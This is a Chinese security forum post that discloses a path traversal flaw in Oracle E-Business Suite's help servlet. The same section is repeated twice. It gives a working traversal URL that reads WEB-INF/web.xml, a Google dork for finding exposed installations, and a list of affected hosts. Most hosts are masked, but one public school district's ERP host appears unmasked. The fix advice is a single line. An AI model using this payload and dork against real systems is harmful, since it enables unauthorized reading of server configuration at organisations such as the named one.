HanDs
管理员

[7月漏洞公开] Oracle EBusiness某版本文件遍历读取漏洞 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

Oracle E-Business某版本存在文件遍历读取漏洞

详细说明:



在某次扫描中发现一处文件遍历读取:



code 区域
http://**.**.**.**:8014/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?





QQ图片20160409112930.png





发现是oracle某个系统



QQ图片20160409113236.jpg







利用特征URL google hacking,发现国外有大量网站使用该系统

code 区域
inurl:'OA_HTML/AppsLocalLogin.jsp'





QQ图片20160409113408.png





虽然有部分网站做了过滤,返回HTTP 410,但很大概率能读到web.xml配置文件

QQ图片20160409113559.png





列举一些存在漏洞的地址:

code 区域
http://**.**.**.**:8014/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

http://**.**.**.**:8000/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

https://myerp.public.apsva.us/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

http://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

http://**.**.**.**:8000/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

https://**.**.**.**.kw/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

漏洞证明:



在某次扫描中发现一处文件遍历读取:



code 区域
http://**.**.**.**:8014/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?





QQ图片20160409112930.png





发现是oracle某个系统



QQ图片20160409113236.jpg







利用特征URL google hacking,发现国外有大量网站使用该系统

code 区域
inurl:'OA_HTML/AppsLocalLogin.jsp'





QQ图片20160409113408.png





虽然有部分网站做了过滤,返回HTTP 410,但很大概率能读到web.xml配置文件

QQ图片20160409113559.png





列举一些存在漏洞的地址:

code 区域
http://**.**.**.**:8014/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

http://**.**.**.**:8000/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

https://myerp.public.apsva.us/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

http://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

http://**.**.**.**:8000/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

https://**.**.**.**.kw/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

修复方案:

过滤+删除帮助文档


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
Oracle EBusiness 某版本文件遍历读取漏洞
#1楼
发帖时间:2016-7-14   |   查看数:0   |   回复数:0
游客组
快速回复